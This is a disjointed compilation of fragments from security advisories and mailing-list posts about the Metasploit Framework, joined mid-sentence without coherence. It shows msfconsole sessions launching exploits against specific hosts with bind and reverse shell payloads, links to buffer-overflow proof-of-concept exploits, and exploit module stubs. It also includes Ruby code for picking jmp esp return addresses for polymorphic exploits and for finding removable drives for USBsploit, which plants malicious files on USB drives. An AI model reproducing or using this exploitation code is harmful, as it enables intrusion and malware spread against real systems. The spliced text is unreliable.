> Example
> =======
>
> # /msf3/msfconsole
>
> _ _ _ _
> | | | | (_) |
> _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
> | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
> With this information, we ran our exploit against the ASUS Eee PC using
> the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> Debian based).
>
>
> msf > use linux/samba/lsa_transnames_heap
> msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> RHOST => 192.168.50.10
> msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> PAYLOAD => linux/x86/shell_bind_tcp
> msf exploit(lsa_transnames_heap) > show targets
# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole
PDF: http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf
TXT: http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.txt
POC: http://security-assessment.com/files/finaldraft8poc.zip
MSF: http://security-assessment.com/files/finaldraft8.rb
NOTE: Tested on v8.01, latest WinXPSP3. No DEP bypass - dodgy PoC.
StoryBoard Quick 6 Stack Buffer Overflow (unpatched)
PDF: http://www.security-assessment.com/files/documents/advisory/Storyboard_Quick6-Stack_Buffer_Overflow.pdf
named 'insert_plugin_meta_info' which is vulnerable to an input
validation flaw in a call to system(). This provides access to the
'soggycat' user account, which has sudo privileges to run the
primary admin tool as root.
msf exploit(accellion_fta_mpipe2) > set RHOST 192.168.198.151
msf exploit(accellion_fta_mpipe2) > exploit
[*] Started reverse handler on 192.168.198.135:4444
[*] Command shell session 1 opened (192.168.198.135:4444 -> 192.168.198.151:42239) at 2010-11-15 23:50:35 -0600
https://www.securinfos.info/VNSECON2007
Covered topics:
* usage, enhancement and exploit modules development for the Metasploit
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF
eXploit Builder
The latest version of the presented tool "MSF eXploit Builder" should be
released in a few days at:
https://www.securinfos.info/metasploit/MSF_XB.php
Hi there,
MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge where the main goal is to code the largest number of new
Metasploit Framework exploit modules.
https://www.securinfos.info/metasploit/msfxdc.php
Your mission, if you choose to accept it, is to code new exploit
modules for the Metasploit Framework (latest 3.x version).
Exploit modules must be new with respect to the current Metasploit Framework
can apply polymorphism in an exploit is to check how many return addresses it
will be able to use in its code.
In this particular vulnerability there are at least two public return
addresses: David Litchfield's 0x42b48774 ("call esp" in SQLSORT.DLL) and
MSF's 0x42b0c9dc ("jmp esp" in SQLSORT.DLL). However, there are many more
DLLs in which we can try to find new return addresses, and we are not yet sure
that there are no more return addresses in this particular DLL.
From my research, I found two more return addresses in SQLSORT.DLL, and
there are many more return addresses in other DLLs. The best way to find
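Finding those extra "jmp esp" / "call esp" addresses is a byte search over the loaded module, and a polymorphic exploit then picks one of the usable hits per run instead of hard-coding 0x42b0c9dc. The Ruby below is an added example, not code from the post: the image bytes and base address are constructed, it assumes a flat already-mapped image (file offset equals RVA), and the bad-byte list is an assumption about what the target protocol will not pass through.

```ruby
# Opcode patterns for the two gadget types named in the text (x86).
GADGETS = {
  "\xFF\xE4".b => "jmp esp",
  "\xFF\xD4".b => "call esp",
}.freeze

# Return every [address, mnemonic] pair found in `image` mapped at `base`.
# Assumption: flat image, so offset == RVA. With a real PE on disk you would
# add (section.VirtualAddress - section.PointerToRawData) per section.
def find_return_addresses(image, base)
  image = image.b
  found = []
  GADGETS.each do |bytes, mnemonic|
    pos = 0
    while (idx = image.index(bytes, pos))
      found << [base + idx, mnemonic]
      pos = idx + 1
    end
  end
  found.sort_by(&:first)
end

# An address is only usable if none of its little-endian bytes is one the
# vulnerable parser strips or terminates on (NUL, CR, LF, space, ...).
def usable?(addr, bad_bytes)
  [addr].pack("V").bytes.none? { |b| bad_bytes.include?(b) }
end

# Polymorphism: choose a different usable return address on each run.
def choose_return_address(candidates, bad_bytes, rng = Random.new)
  ok = candidates.select { |addr, _| usable?(addr, bad_bytes) }
  raise "no usable return address" if ok.empty?
  ok[rng.rand(ok.size)]
end

# Constructed stand-in for a DLL image: one call esp at +0x20, two jmp esp at
# +0x32 and +0x41. The base is chosen so the addresses contain no NUL byte.
FAKE_BASE  = 0x42B48000
FAKE_IMAGE = ("\x90" * 0x20 + "\xFF\xD4" +
              "\x00" * 0x10 + "\xFF\xE4" +
              "\xCC" * 0x0D + "\xFF\xE4").b
BAD_BYTES  = [0x00, 0x0A, 0x0D, 0x20]

if __FILE__ == $0
  cands = find_return_addresses(FAKE_IMAGE, FAKE_BASE)
  cands.each { |addr, m| puts format("0x%08x  %s  usable=%s", addr, m, usable?(addr, BAD_BYTES)) }
  addr, m = choose_return_address(cands, BAD_BYTES)
  puts format("using 0x%08x (%s)", addr, m)
end
```

Run against a real SQLSORT.DLL you would read the file, map each section to its RVA, and feed the mapped bytes with the module's actual load base; the selection logic stays the same.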
Having not found one (except msf) that reliably works against my own setup, I
thought of writing my own MS08-067 exploit piece. Plugged in the shellcode for
win2k and win2k3[sp2]. No plans for updating the XP shellcode.
Grab the python here:
http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
-d
0x00 Tech Gyan - Using Metasploit with Nessus Bridge on Ubuntu
0x01 Tool Gyan - Armitage – The Ultimate Attack Platform for Metasploit
0x02 Mom's Guide - Penetration Testing with Metasploit Framework
0x03 Legal Gyan - Trademark Law and Cyberspace
0x04 Matriux Vibhag - The Exploitation Ka Baap MSF
Check http://chmag.in for articles.
PDF version can be downloaded from: http://chmag.in/issue/jul2011.pdf
Hope you'll enjoy the magazine. Please send your suggestions, feedback to info@chmag.in
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Osx::Browser::Software_Update < Msf::Exploit::Remote
USB files remotely on multiple targets at the same time; a set of
extensions to dump can be specified. All EXE, PDF and LNK files already
present on the target USB drives can also be replaced by malicious ones,
or only the EXE files (likewise for PDF or LNK). USBsploit works through
Meterpreter sessions (wmic, railgun, process migration) with a minimal
(30M - not mini msf) modified version of Metasploit (updated to
v3.5.1-dev svn r11223 2010.12.04). The interface is a mod of SET (The
Social Engineering Toolkit).
Note that if wmic is not available on a target, railgun will now be used
with GetLogicalDrives(), GetDriveTypeN() and GetVolumeInformationW().
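The railgun fallback amounts to decoding the GetLogicalDrives bitmask and keeping the roots whose drive type is DRIVE_REMOVABLE. The Ruby below is an added example, not USBsploit's code: `removable_drives` expects an object behaving like `client.railgun.kernel32` (assumed: methods named after the Win32 calls, each returning a Hash with the result under `"return"`), and `FakeKernel32` is a constructed stand-in so the logic runs without a session.

```ruby
DRIVE_REMOVABLE = 2   # GetDriveType value for USB sticks, floppies
DRIVE_FIXED     = 3
DRIVE_CDROM     = 5

# GetLogicalDrives returns a 26-bit mask: bit 0 = A:, bit 1 = B:, and so on.
def drive_letters(mask)
  (0...26).select { |i| mask[i] == 1 }.map { |i| (65 + i).chr + ":\\" }
end

# rg: something like client.railgun.kernel32 on a live Meterpreter session
# (assumed railgun call shape: rg.GetLogicalDrives()["return"]).
def removable_drives(rg)
  mask = rg.GetLogicalDrives()["return"]
  drive_letters(mask).select do |root|
    rg.GetDriveTypeW(root)["return"] == DRIVE_REMOVABLE
  end
end

# Constructed stand-in for railgun's kernel32 so the example runs offline.
class FakeKernel32
  def initialize(types)
    @types = types            # { "C:\\" => DRIVE_FIXED, ... }
  end

  def GetLogicalDrives
    mask = @types.keys.inject(0) { |m, root| m | (1 << (root.ord - 65)) }
    { "GetLastError" => 0, "return" => mask }
  end

  def GetDriveTypeW(root)
    { "GetLastError" => 0, "return" => @types.fetch(root, 1) }  # 1 = DRIVE_NO_ROOT_DIR
  end
end

def demo
  rg = FakeKernel32.new("C:\\" => DRIVE_FIXED, "D:\\" => DRIVE_CDROM,
                        "E:\\" => DRIVE_REMOVABLE, "F:\\" => DRIVE_REMOVABLE)
  removable_drives(rg)
end

puts demo.inspect if __FILE__ == $0
```

Inside a Meterpreter script the call would be `removable_drives(client.railgun.kernel32)`; the wmic route in the announcement gives the same answer through `Win32_LogicalDisk`, which is why railgun is only the fallback.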
Exploit
Here is a PoC exploit module for metasploit that you could use to reproduce the crash:
require 'msf/core'
module Msf
module Exploits
module Test